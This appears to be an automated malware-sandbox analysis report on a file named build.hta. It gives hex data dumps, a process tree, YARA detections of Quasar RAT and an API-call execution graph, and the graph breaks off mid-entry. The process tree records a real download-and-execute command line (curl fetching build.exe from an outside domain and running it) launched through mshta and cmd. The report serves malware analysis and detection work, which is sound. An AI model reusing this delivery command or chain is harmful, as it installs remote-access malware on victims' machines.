                    Data Ascii: V1^PbguXSPAy[VPa^WRG_R Zkp;fDkp+kp+Q>IDCYRS{ZRQZLPQVd9
                    2024-06-08 23:26:07 UTC1369INData Raw: 3a 42 3d 42 35 83 c4 04 e8 0a 00 00 00 00 41 4c 44 3f 33 44 38 4d 32 83 c4 04 81 e2 34 60 01 00 5a 50 e8 0b 00 00 00 00 3e 35 41 48 4e 34 4d 4f 3b 47 83 c4 04 81 e8 d3 20 00 00 81 f0 f1 f7 00 00 58 56 81 ee fd 77 01 00 eb 07 45 3e 4e 4f 40 3c 40 5e 8b 8d 90 fd ff ff 83 c1 70 6b 95 94 fd ff ff 70 81 c2 3b 66 f3 44 6b 85 94 fd ff ff 70 2b d0 33 ca 0f af 8d 94 fd ff ff 89 8d f0 e0 ff ff 8b 8d f0 e0 ff ff 89 8d e4 e0 ff ff 56 50 83 c4 04 e8 0a 00 00 00 00 40 39 4a 39 4a 3d 4c 39 49 83 c4 04 5e 53 81 e3 d6 2d 01 00 81 c3 5b 08 01 00 81 eb a0 85 01 00 81 cb 9d 66 00 00 5b 8b 95 70 f5 ff ff 83 c2 70 6b 85 74 f5 ff ff 70 05 3b 66 f3 44 6b 8d 74 f5 ff ff 70 2b c1 33 d0 0f af 95 74 f5 ff ff 89 95 ec e0 ff ff 8b 95 ec e0 ff ff 89 95 e8 e0 ff ff 8b 85 4c ea ff ff 0f
                    Data Ascii: :B=B5ALD?3D8M24`ZP>5AHN4MO;G XVwE>NO@<@^pkp;fDkp+3VP@9J9J=L9I^S-[f[ppktp;fDktp+3tL
                    2024-06-08 23:26:07 UTC1369INData Raw: ff ff 70 2b d1 89 95 5c ef ff ff 8b 95 5c ef ff ff 8b 85 60 ef ff ff 89 55 ec 89 45 f0 56 52 83 c4 04 81 ce 07 7e 00 00 81 e6 06 39 00 00 81 e6 1b 9a 00 00 81 ee 44 40 00 00 5e 52 81 e2 f8 39 00 00 81 e2 28 72 01 00 81 e2 6a b7 00 00 5a 57 81 cf 5d fb 00 00 eb 05 39 44 4e 4c 4d e8 0a 00 00 00 00 42 41 4e 36 33 4f 4b 46 40 83 c4 04 e8 09 00 00 00 00 4f 43 3f 3f 46 40 38 35 83 c4 04 5f 8b 4d d0 83 c1 70 6b 55 d4 70 81 c2 3b 66 f3 44 6b 45 d4 70 2b d0 33 ca 0f af 4d d4 89 8d ac e0 ff ff 8b 8d ac e0 ff ff 89 8d a8 e0 ff ff 81 bd a8 e0 ff ff e7 09 00 00 0f 85 c1 0e 00 00 56 81 ee cc c5 00 00 eb 04 49 41 39 4e 81 ce 60 07 00 00 5e 57 52 83 c4 04 81 ef e9 12 00 00 e8 0a 00 00 00 00 44 34 4e 3a 4a 4f 3c 46 3a 83 c4 04 5f 56 81 e6 99 af 00 00 81 e6 d4 63 00 00 5e
                    Data Ascii: p+\\`UEVR~9D@^R9(rjZW]9DNLMBAN63OKF@OC??F@85_MpkUp;fDkEp+3MVIA9N`^WRD4N:JO<F:_Vc^
                    2024-06-08 23:26:07 UTC1369INData Raw: ff 89 8d 88 e0 ff ff 8b 8d 88 e0 ff ff 89 8d 84 e0 ff ff 8b 95 84 e0 ff ff 83 c2 38 89 95 80 e0 ff ff c7 85 08 f5 ff ff 01 00 00 00 53 57 83 c4 04 81 cb 87 82 01 00 5b 50 56 83 c4 04 81 f0 8b fe 00 00 58 52 81 c2 9c 0c 01 00 81 ea 1f 64 00 00 81 ea 37 69 01 00 81 e2 89 fa 00 00 5a 6b 85 08 f5 ff ff 70 05 3b 66 f3 44 6b 8d 08 f5 ff ff 70 2b c1 33 85 80 e0 ff ff 0f af 85 08 f5 ff ff 6b 95 08 f5 ff ff 70 2b c2 89 85 04 f5 ff ff 53 56 83 c4 04 eb 05 4e 44 42 3c 34 81 f3 4e 24 00 00 5b 52 50 83 c4 04 eb 05 37 35 34 36 43 81 ca 75 27 00 00 81 c2 f4 b7 00 00 81 ca 69 54 01 00 5a 53 51 83 c4 04 81 f3 23 a9 00 00 81 e3 47 22 00 00 5b 56 51 83 c4 04 81 e6 a7 f3 00 00 81 e6 39 2c 00 00 81 ce f7 7d 01 00 eb 06 3f 46 4a 4b 47 41 5e c7 85 20 fd ff ff 01 00 00 00 56 81
                    Data Ascii: 8SW[PVXRd7iZkp;fDkp+3kp+SVNDB<4N$[RP7546Cu'iTZSQ#G"[VQ9,}?FJKGA^ V


                    Click to jump to process

                    Click to jump to process

                    Click to dive into process behavior distribution

                    Click to jump to process

                    Target ID:0
                    Start time:19:26:05
                    Start date:08/06/2024
                    Path:C:\Windows\SysWOW64\mshta.exe
                    Wow64 process (32bit):true
                    Commandline:mshta.exe "C:\Users\user\Desktop\build.hta"
                    Imagebase:0xac0000
                    File size:13'312 bytes
                    MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    Target ID:1
                    Start time:19:26:05
                    Start date:08/06/2024
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\cmd.exe" /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe
                    Imagebase:0x240000
                    File size:236'544 bytes
                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:2
                    Start time:19:26:05
                    Start date:08/06/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:4
                    Start time:19:26:05
                    Start date:08/06/2024
                    Path:C:\Windows\SysWOW64\curl.exe
                    Wow64 process (32bit):true
                    Commandline:curl -L https://mediafire.zip/build.exe -o build.exe
                    Imagebase:0xe0000
                    File size:470'528 bytes
                    MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    Target ID:5
                    Start time:19:26:08
                    Start date:08/06/2024
                    Path:C:\Users\user\Desktop\build.exe
                    Wow64 process (32bit):true
                    Commandline:build.exe
                    Imagebase:0x400000
                    File size:3'124'224 bytes
                    MD5 hash:05EECFC1820AB3273409323601A71F23
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Quasarrat_e52df647, Description: unknown, Source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, Author: unknown
                    • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, Author: Florian Roth
                    • Rule: Quasar, Description: detect Remcos in memory, Source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Quasarrat_e52df647, Description: unknown, Source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                    • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: Quasar, Description: detect Remcos in memory, Source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Antivirus matches:
                    • Detection: 16%, ReversingLabs
                    • Detection: 20%, Virustotal, Browse
                    Reputation:low
                    Has exited:true

                    Target ID:9
                    Start time:19:26:35
                    Start date:08/06/2024
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                    Imagebase:0x100000
                    File size:2'141'552 bytes
                    MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_Quasarrat_e52df647, Description: unknown, Source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                    • Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                    • Rule: Quasar, Description: detect Remcos in memory, Source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:moderate
                    Has exited:false

                    Reset < >
                      Memory Dump Source
                      • Source File: 00000000.00000003.1733872709.0000000006960000.00000010.00000800.00020000.00000000.sdmp, Offset: 06960000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_3_6960000_mshta.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                      • Instruction ID: 6b15eb786b658543b5f1754be5bce9aa221c05a3a7c19c52d7b0715bbba2d7c2
                      • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                      • Instruction Fuzzy Hash:

                      Execution Graph

                      Execution Coverage:1.5%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:19.1%
                      Total number of Nodes:622
                      Total number of Limit Nodes:1
                      execution_graph 5146 406660 5147 426668 5146->5147 5158 4cedd0 5147->5158 5149 426671 5150 4266f2 5149->5150 5151 4cedd0 10 API calls 5149->5151 5152 426772 5151->5152 5154 426786 5152->5154 5166 592716 5152->5166 5155 426889 5171 4230e0 5155->5171 5159 4cedfe 5158->5159 5160 4cee40 5158->5160 5177 592b09 EnterCriticalSection 5159->5177 5160->5149 5162 4cee08 5162->5160 5163 592716 IsProcessorFeaturePresent 5162->5163 5164 4cee22 5163->5164 5182 592abf EnterCriticalSection LeaveCriticalSection 5164->5182 5168 59271b 5166->5168 5167 592735 5167->5155 5168->5167 5169 593008 IsProcessorFeaturePresent 5168->5169 5170 59302d 5169->5170 5170->5155 5172 42310b 5171->5172 5189 57eff1 5172->5189 5176 42319d 5178 592b1d 5177->5178 5179 592b22 LeaveCriticalSection 5178->5179 5186 592b91 5178->5186 5179->5162 5183 592b5b 5182->5183 5184 592b77 SetEvent ResetEvent 5183->5184 5185 592b66 5183->5185 5184->5160 5185->5160 5187 592bb8 LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 5186->5187 5188 592b9f 5186->5188 5187->5188 5188->5178 5190 57effb __EH_prolog 5189->5190 5205 57f258 5190->5205 5195 525120 5196 52514e 5195->5196 5204 5251bd 5195->5204 5197 592b09 5 API calls 5196->5197 5198 525158 5197->5198 5199 592716 IsProcessorFeaturePresent 5198->5199 5198->5204 5200 525174 5199->5200 5202 5251a7 5200->5202 5217 4b0700 5200->5217 5203 592abf __Init_thread_footer 4 API calls 5202->5203 5203->5204 5204->5176 5206 592716 IsProcessorFeaturePresent 5205->5206 5207 57f034 5206->5207 5208 57f2d4 5207->5208 5211 57f548 5208->5211 5210 42312c 5210->5176 5210->5195 5212 57f557 5211->5212 5214 57f5ad 5211->5214 5213 592716 IsProcessorFeaturePresent 5212->5213 5216 57f55e 5213->5216 5215 57f548 IsProcessorFeaturePresent 5214->5215 5214->5216 5215->5216 5216->5210 5218 4b076c 5217->5218 5220 4b070e 5217->5220 5218->5200 5219 4b0762 5219->5200 5220->5219 5222 52d910 5220->5222 5223 52db10 5222->5223 5224 52d937 5222->5224 5223->5220 5225 592b09 5 API calls 5224->5225 5226 52d941 5225->5226 5226->5223 5227 592abf __Init_thread_footer 4 API calls 5226->5227 5227->5223 5228 407002 5229 407015 5228->5229 5234 40702c 5229->5234 5235 40774a 5234->5235 5236 40776f VirtualProtect 5235->5236 5237 4077a9 5236->5237 5253 4026c2 5254 4226c6 5253->5254 5257 421cf0 GetDC 5254->5257 5256 4226d3 5258 421d23 ReleaseDC 5257->5258 5258->5256 5268 421f40 5269 421f5e 5268->5269 5274 422147 5268->5274 5270 422158 5269->5270 5271 421f6c GetClientRect 5269->5271 5272 422161 5270->5272 5273 42236c 5270->5273 5275 42209d 5271->5275 5291 421faa 5271->5291 5272->5274 5277 422184 BeginDeferWindowPos 5272->5277 5273->5274 5279 42239a GetWindowLongW GetWindowLongW 5273->5279 5275->5274 5280 4220b2 GetWindowLongW 5275->5280 5276 421fb0 GetDlgItem 5281 421fd3 GetWindowRect 5276->5281 5276->5291 5278 4222d4 5277->5278 5296 4221bc 5277->5296 5286 422355 EndDeferWindowPos 5278->5286 5287 4222da GetClientRect 5278->5287 5282 4223c7 5279->5282 5283 42241f 5279->5283 5280->5274 5284 4220c3 CreateWindowExW 5280->5284 5285 421fea MapWindowPoints 5281->5285 5281->5291 5282->5283 5288 4223ce MapDialogRect AdjustWindowRectEx 5282->5288 5283->5274 5293 42242d MapDialogRect AdjustWindowRectEx 5283->5293 5284->5274 5289 4220f8 GetClientRect 5284->5289 5285->5291 5286->5274 5287->5286 5290 4222ec GetWindowRect 5287->5290 5288->5283 5289->5274 5292 42210a GetWindowRect 5289->5292 5290->5286 5294 4222fe IsZoomed DeferWindowPos EndDeferWindowPos 5290->5294 5291->5275 5291->5276 5292->5274 5295 42211c SetWindowPos 5292->5295 5293->5274 5294->5274 5295->5274 5297 4222a0 DeferWindowPos 5296->5297 5298 422294 GetDlgItem 5296->5298 5297->5278 5297->5296 5298->5297 5321 401922 5323 42192a 5321->5323 5322 4219bd 5323->5322 5324 42198b 5323->5324 5325 42194f SendMessageW 5323->5325 5324->5322 5327 42198f GetWindowRect 5324->5327 5325->5324 5326 421963 SendMessageW SendMessageW 5325->5326 5326->5324 5329 421a40 5327->5329 5330 421a53 5329->5330 5331 421a60 SendMessageW 5330->5331 5332 421a75 SendMessageW 5330->5332 5331->5332 5333 421ae3 5332->5333 5334 421aaf SendMessageW SendMessageW 5332->5334 5333->5322 5334->5333 4755 4099c4 4758 41611c 4755->4758 4759 416160 NtQueryDefaultLocale 4758->4759 4761 4161c1 4759->4761 4764 4161f0 4759->4764 4766 4161f8 4761->4766 4772 41639f 4764->4772 4765 416395 4767 416216 4766->4767 4788 4162ee 4767->4788 4773 416431 4772->4773 4774 416455 4773->4774 4775 4164c0 4773->4775 4776 41706c 4774->4776 4777 41675f 4774->4777 4795 41653f 4775->4795 4786 417101 4776->4786 4817 417134 4776->4817 4799 4168bb 4777->4799 4782 4168b3 4785 41776c NtQueryDefaultLocale 4787 417783 4785->4787 4786->4785 4787->4765 4789 4162fc 4788->4789 4791 416303 4788->4791 4793 416313 4791->4793 4792 41639f 16 API calls 4794 416395 4792->4794 4793->4792 4796 416550 4795->4796 4820 4165d0 4796->4820 4798 4165c7 4800 4168f7 4799->4800 4801 4168e8 4799->4801 4867 41692b 4800->4867 4803 416bee 4801->4803 4812 416c2f 4801->4812 4899 416c1c 4803->4899 4806 416c15 4807 416c8f 4809 416fc5 4807->4809 4912 416fcc 4807->4912 4810 417134 5 API calls 4809->4810 4815 417101 4809->4815 4810->4815 4811 416923 4811->4801 4883 41697f 4811->4883 4812->4807 4902 416eb7 4812->4902 4814 41776c NtQueryDefaultLocale 4816 417783 4814->4816 4815->4814 4816->4782 4930 417150 4817->4930 4819 417148 4821 4165d8 4820->4821 4822 41652b 4821->4822 4823 4165f4 4821->4823 4826 41653f 14 API calls 4822->4826 4824 4166b8 4823->4824 4825 416678 4823->4825 4851 4166e1 4824->4851 4841 416695 4825->4841 4828 416535 4826->4828 4831 4165d0 14 API calls 4828->4831 4830 41668a 4833 41706c 4830->4833 4834 41675f 4830->4834 4832 4165c7 4831->4832 4835 417134 5 API calls 4833->4835 4840 417101 4833->4840 4836 4168bb 12 API calls 4834->4836 4835->4840 4837 4168b3 4836->4837 4838 41776c NtQueryDefaultLocale 4839 417783 4838->4839 4839->4798 4840->4838 4842 4166a1 4841->4842 4843 41706c 4842->4843 4844 41675f 4842->4844 4845 417134 5 API calls 4843->4845 4849 417101 4843->4849 4846 4168bb 12 API calls 4844->4846 4845->4849 4847 4168b3 4846->4847 4848 41776c NtQueryDefaultLocale 4850 417783 4848->4850 4849->4848 4850->4830 4852 4166e9 4851->4852 4853 416716 4852->4853 4854 4164cc 4852->4854 4855 41706c 4853->4855 4857 41675f 4853->4857 4856 41653f 14 API calls 4854->4856 4859 417134 5 API calls 4855->4859 4865 417101 4855->4865 4858 416535 4856->4858 4860 4168bb 12 API calls 4857->4860 4862 4165d0 14 API calls 4858->4862 4859->4865 4861 4168b3 4860->4861 4863 4165c7 4862->4863 4864 41776c NtQueryDefaultLocale 4866 417783 4864->4866 4865->4864 4866->4830 4868 416944 4867->4868 4873 416953 4867->4873 4870 416bee 4868->4870 4878 416c2f 4868->4878 4869 41697f 10 API calls 4869->4873 4871 416c1c NtQueryDefaultLocale 4870->4871 4872 416c15 4871->4872 4873->4868 4873->4869 4874 416c8f 4875 416fcc 6 API calls 4874->4875 4876 416fc5 4874->4876 4875->4876 4877 417134 5 API calls 4876->4877 4881 417101 4876->4881 4877->4881 4878->4874 4879 416eb7 8 API calls 4878->4879 4879->4874 4880 41776c NtQueryDefaultLocale 4882 417783 4880->4882 4881->4880 4882->4811 4885 41695f 4883->4885 4884 416b0b 4886 416bee 4884->4886 4894 416c2f 4884->4894 4885->4884 4887 41697f 9 API calls 4885->4887 4888 416c1c NtQueryDefaultLocale 4886->4888 4887->4885 4889 416c15 4888->4889 4890 416c8f 4891 416fcc 6 API calls 4890->4891 4892 416fc5 4890->4892 4891->4892 4893 417134 5 API calls 4892->4893 4897 417101 4892->4897 4893->4897 4894->4890 4895 416eb7 8 API calls 4894->4895 4895->4890 4896 41776c NtQueryDefaultLocale 4898 417783 4896->4898 4897->4896 4898->4811 4900 41776c NtQueryDefaultLocale 4899->4900 4901 417783 4900->4901 4901->4806 4903 416efa 4902->4903 4905 416eee 4902->4905 4916 416f0e 4903->4916 4906 416fcc 6 API calls 4905->4906 4907 416fc5 4905->4907 4906->4907 4908 417134 5 API calls 4907->4908 4911 417101 4907->4911 4908->4911 4909 41776c NtQueryDefaultLocale 4910 417783 4909->4910 4910->4807 4911->4909 4913 416feb 4912->4913 4924 416ffe 4913->4924 4915 416ff6 4917 416f53 4916->4917 4918 416fcc 6 API calls 4917->4918 4919 416fc5 4917->4919 4918->4919 4920 417134 5 API calls 4919->4920 4923 417101 4919->4923 4920->4923 4921 41776c NtQueryDefaultLocale 4922 417783 4921->4922 4922->4905 4923->4921 4925 417027 4924->4925 4926 41776c NtQueryDefaultLocale 4925->4926 4927 417134 5 API calls 4925->4927 4928 417101 4925->4928 4929 417783 4926->4929 4927->4928 4928->4926 4929->4915 4932 41716c 4930->4932 4937 41715d 4930->4937 4934 417324 4932->4934 4932->4937 4939 417194 4932->4939 4953 417392 4932->4953 4933 41776c NtQueryDefaultLocale 4938 417783 4933->4938 4948 417331 4934->4948 4937->4933 4938->4819 4943 417178 4939->4943 4940 417324 4941 417331 2 API calls 4940->4941 4947 41732a 4941->4947 4942 417392 3 API calls 4942->4943 4943->4940 4943->4942 4944 417194 3 API calls 4943->4944 4943->4947 4944->4943 4945 41776c NtQueryDefaultLocale 4946 417783 4945->4946 4946->4932 4947->4945 4964 417344 4948->4964 4950 41776c NtQueryDefaultLocale 4951 417783 4950->4951 4951->4937 4952 417339 4952->4950 4955 417178 4953->4955 4959 4173c2 4953->4959 4954 417194 3 API calls 4954->4955 4955->4954 4957 417324 4955->4957 4958 4172a0 4955->4958 4955->4959 4961 417392 3 API calls 4955->4961 4956 41776c NtQueryDefaultLocale 4962 417783 4956->4962 4960 417331 2 API calls 4957->4960 4958->4955 4958->4959 4959->4956 4963 41732a 4960->4963 4961->4958 4962->4932 4963->4959 4967 41734f 4964->4967 4965 41776c NtQueryDefaultLocale 4966 417783 4965->4966 4966->4952 4967->4965 5260 54c6d1 GetLastError 5261 54c6ea 5260->5261 5335 403785 5337 423789 5335->5337 5336 4237e7 5337->5336 5338 4230e0 10 API calls 5337->5338 5339 4237cc 5338->5339 5341 423aa0 5339->5341 5343 423ae6 5341->5343 5342 423afa 5342->5336 5343->5342 5346 423bc0 5343->5346 5347 423beb 5346->5347 5351 423c08 5346->5351 5352 422750 5347->5352 5349 422750 15 API calls 5350 423b74 5349->5350 5350->5336 5351->5349 5351->5350 5353 422761 5352->5353 5359 4227bf 5352->5359 5354 422796 5353->5354 5355 4227c8 5353->5355 5353->5359 5356 4227b4 DestroyWindow 5354->5356 5354->5359 5357 422816 5355->5357 5358 4227fe 5355->5358 5355->5359 5356->5359 5357->5359 5361 42282d DestroyWindow 5357->5361 5362 422a70 5358->5362 5359->5350 5361->5359 5363 422a9b 5362->5363 5372 422b8c 5362->5372 5373 422c40 5363->5373 5366 422ba8 5368 422bc7 GetDlgItem SendMessageW 5366->5368 5367 422b1c GetDlgItem 5369 422b51 5367->5369 5370 422bfb DestroyWindow 5368->5370 5377 421920 5369->5377 5370->5372 5372->5359 5374 422c75 5373->5374 5375 592716 IsProcessorFeaturePresent 5374->5375 5376 422b14 5375->5376 5376->5366 5376->5367 5379 42192a 5377->5379 5378 4219bd 5378->5372 5379->5378 5380 42198b 5379->5380 5381 42194f SendMessageW 5379->5381 5380->5378 5383 42198f GetWindowRect 5380->5383 5381->5380 5382 421963 SendMessageW SendMessageW 5381->5382 5382->5380 5384 421a40 4 API calls 5383->5384 5384->5378 5238 406c07 5239 40774a 5238->5239 5240 40776f VirtualProtect 5239->5240 5241 4077a9 5240->5241 5385 409388 5386 409359 5385->5386 5387 40938d 5385->5387 5388 41f371 11 API calls 5387->5388 5389 41f367 5388->5389 4968 40776a 4969 40776f VirtualProtect 4968->4969 4970 4077a9 4969->4970 5242 593435 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 4752 4202b2 4753 4202d0 ExitProcess 4752->4753 5390 4095b3 5391 41c3de 5390->5391 5392 425461 5391->5392 5400 424da0 5391->5400 5394 4254df 5395 4cedd0 10 API calls 5394->5395 5396 4254ed 5395->5396 5397 425557 5396->5397 5405 425370 5396->5405 5416 4257a0 5397->5416 5423 427870 5400->5423 5402 424e08 5403 4cedd0 10 API calls 5402->5403 5404 424e44 5403->5404 5404->5394 5406 592716 IsProcessorFeaturePresent 5405->5406 5407 425397 5406->5407 5408 425461 5407->5408 5409 424da0 13 API calls 5407->5409 5408->5397 5410 4254df 5409->5410 5411 4cedd0 10 API calls 5410->5411 5413 4254ed 5411->5413 5412 425557 5415 4257a0 14 API calls 5412->5415 5413->5412 5414 425370 27 API calls 5413->5414 5414->5412 5415->5408 5417 425818 5416->5417 5418 425900 5417->5418 5419 42590b 5417->5419 5437 425ea0 5418->5437 5443 425cd0 5419->5443 5422 425909 5422->5392 5424 427880 5423->5424 5427 4278bb 5424->5427 5428 429510 5424->5428 5426 42789d 5426->5402 5427->5402 5429 429541 5428->5429 5430 42952f 5428->5430 5429->5426 5430->5429 5431 429582 QueryPerformanceCounter 5430->5431 5432 4295ad QueryPerformanceFrequency 5431->5432 5433 4295f9 5431->5433 5432->5433 5434 4295c4 5432->5434 5435 429625 QueryPerformanceCounter 5433->5435 5434->5426 5436 429645 5435->5436 5436->5426 5438 425efc 5437->5438 5447 425120 5438->5447 5440 425f0e 5441 425cd0 14 API calls 5440->5441 5442 425f66 5441->5442 5442->5422 5444 425dbb 5443->5444 5445 425cfd 5443->5445 5444->5422 5446 425120 14 API calls 5445->5446 5446->5444 5452 4e5510 5447->5452 5449 425149 5457 4279a0 5449->5457 5451 42515e 5451->5440 5453 4e553c GetCurrentThreadId 5452->5453 5454 4e554a 5452->5454 5453->5454 5461 4e54b0 5454->5461 5456 4e5586 5456->5449 5458 4279c4 5457->5458 5464 57fd4a 5458->5464 5460 4279f8 5460->5451 5462 4e54bc GetCurrentThreadId 5461->5462 5463 4e54ca 5461->5463 5462->5463 5463->5456 5465 57fd54 __EH_prolog 5464->5465 5467 57fdfd 5465->5467 5470 591b20 5465->5470 5469 57fe21 5467->5469 5479 591960 5467->5479 5469->5460 5471 591b5f 5470->5471 5472 591b92 GetCurrentThread GetThreadPriority 5471->5472 5473 591960 6 API calls 5472->5473 5474 591ba8 5473->5474 5475 591c02 5474->5475 5476 591bc5 SetThreadPriority ResumeThread 5474->5476 5478 591c07 GetCurrentThread GetThreadPriority 5475->5478 5477 591bde 5476->5477 5477->5465 5478->5465 5480 591969 GetCurrentThread GetThreadPriority GetThreadPriority 5479->5480 5481 5919b0 5479->5481 5482 591990 WaitForSingleObject 5480->5482 5483 591986 SetThreadPriority 5480->5483 5481->5467 5484 5919a0 CloseHandle 5482->5484 5485 5919b2 5482->5485 5483->5482 5484->5481 5485->5467 5262 4070f4 5263 4073aa 5262->5263 5264 40743c 5263->5264 5266 4076bb VirtualProtect 5263->5266 5265 40776f VirtualProtect 5264->5265 5267 4077a9 5265->5267 5266->5263 5486 4095b9 5487 41c7bf 5486->5487 5488 41c9f9 5487->5488 5491 41d306 5487->5491 5498 41caba 5488->5498 5492 41da06 VirtualProtect 5491->5492 5493 41da27 5492->5493 5494 41da41 11 API calls 5493->5494 5495 41da37 5494->5495 5496 41f371 11 API calls 5495->5496 5497 41f367 5496->5497 5504 41cb52 5498->5504 5499 41da06 VirtualProtect 5501 41da27 5499->5501 5500 41cf29 5507 41ce88 5500->5507 5536 41d257 5500->5536 5503 41da41 11 API calls 5501->5503 5508 41da37 5503->5508 5506 41cb82 5504->5506 5512 41cd00 5504->5512 5506->5500 5506->5507 5526 41d1b8 5506->5526 5507->5499 5509 41f371 11 API calls 5508->5509 5510 41f367 5509->5510 5513 41cbf9 5512->5513 5513->5512 5514 41cd00 13 API calls 5513->5514 5523 41cda5 5513->5523 5514->5513 5515 41ce88 5516 41da06 VirtualProtect 5515->5516 5517 41da27 5516->5517 5518 41da41 11 API calls 5517->5518 5520 41da37 5518->5520 5519 41d257 12 API calls 5519->5515 5521 41f371 11 API calls 5520->5521 5522 41f367 5521->5522 5523->5515 5524 41d1b8 13 API calls 5523->5524 5525 41cf29 5523->5525 5524->5525 5525->5515 5525->5519 5527 41d1c5 5526->5527 5528 41d257 12 API calls 5527->5528 5529 41d250 5527->5529 5528->5529 5530 41da06 VirtualProtect 5529->5530 5531 41da27 5530->5531 5532 41da41 11 API calls 5531->5532 5533 41da37 5532->5533 5534 41f371 11 API calls 5533->5534 5535 41f367 5534->5535 5541 41d261 5536->5541 5537 41da06 VirtualProtect 5538 41da27 5537->5538 5539 41da41 11 API calls 5538->5539 5540 41da37 5539->5540 5542 41f371 11 API calls 5540->5542 5541->5537 5543 41f367 5542->5543 4971 4066db 4972 41d843 4971->4972 4974 41d957 VirtualProtect 4972->4974 4981 41d991 4972->4981 4976 41da27 4974->4976 4989 41da41 4976->4989 4982 41d9bc VirtualProtect 4981->4982 4984 41da27 4982->4984 4985 41da41 11 API calls 4984->4985 4986 41da37 4985->4986 4993 41f371 4986->4993 4990 41da58 4989->4990 4991 41f371 11 API calls 4990->4991 4992 41f367 4991->4992 4994 41f394 4993->4994 4998 41f506 4993->4998 5002 41f510 4994->5002 5008 41fcb2 4998->5008 5003 41f51d 5002->5003 5004 41f52c 5002->5004 5020 41f7fd 5003->5020 5012 41f557 5004->5012 5009 41fcc6 ExitProcess 5008->5009 5010 41fccf 3 API calls 5008->5010 5010->5009 5013 41f56f 5012->5013 5014 41f579 5013->5014 5023 41f5bc 5013->5023 5016 41f7fd 10 API calls 5014->5016 5017 41f7f2 5016->5017 5053 41f810 5020->5053 5024 41f5f3 5023->5024 5029 41f690 5024->5029 5030 41f6b0 5029->5030 5031 41f5f3 5030->5031 5037 41f6bc 5030->5037 5033 41f690 10 API calls 5031->5033 5032 41f75e 5045 41f7ae 5032->5045 5036 41f689 5033->5036 5039 41f7fd 10 API calls 5036->5039 5037->5032 5041 41f768 5037->5041 5040 41f7f2 5039->5040 5042 41f7e8 5041->5042 5043 41f7fd 10 API calls 5042->5043 5044 41f7f2 5043->5044 5046 41f594 5045->5046 5052 41f689 5045->5052 5047 41f5bc 10 API calls 5046->5047 5046->5052 5050 41f5b4 5047->5050 5048 41f7fd 10 API calls 5049 41f7f2 5048->5049 5051 41f690 10 API calls 5050->5051 5051->5052 5052->5048 5060 41f823 ExitProcess 5053->5060 5061 41f864 5053->5061 5055 41fbd9 5057 41fcb2 4 API calls 5055->5057 5058 41fcab 5057->5058 5085 41fccf 5058->5085 5065 41f8c4 5061->5065 5066 41faef 5061->5066 5065->5055 5078 41fbe1 5065->5078 5096 41fafe 5066->5096 5079 41fbf2 5078->5079 5080 41fcb2 4 API calls 5079->5080 5082 4203a1 ExitProcess 5079->5082 5081 41fcab 5080->5081 5083 